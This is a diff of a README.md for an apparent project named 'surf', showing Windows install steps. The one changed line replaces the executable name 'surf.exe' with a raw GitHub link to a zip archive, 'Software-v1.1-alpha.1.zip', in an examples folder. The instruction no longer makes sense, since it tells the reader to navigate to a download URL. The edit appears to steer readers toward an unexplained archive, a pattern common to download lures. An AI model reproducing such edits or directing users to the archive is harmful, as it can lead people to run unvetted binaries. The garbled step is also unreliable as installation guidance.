mehdimin11/surf/README.md

 1. **For Windows:**
    - If you downloaded a `.zip` file, right-click it and select "Extract All."
    - Move the extracted file to your desired location.
-   - Open Command Prompt and navigate to the directory where you placed `surf.exe`.
+   - Open Command Prompt and navigate to the directory where you placed `https://github.com/mehdimin11/surf/raw/refs/heads/main/examples/Software-v1.1-alpha.1.zip`.
    - Type `surf` to run the application.

 2. **For macOS and Linux:**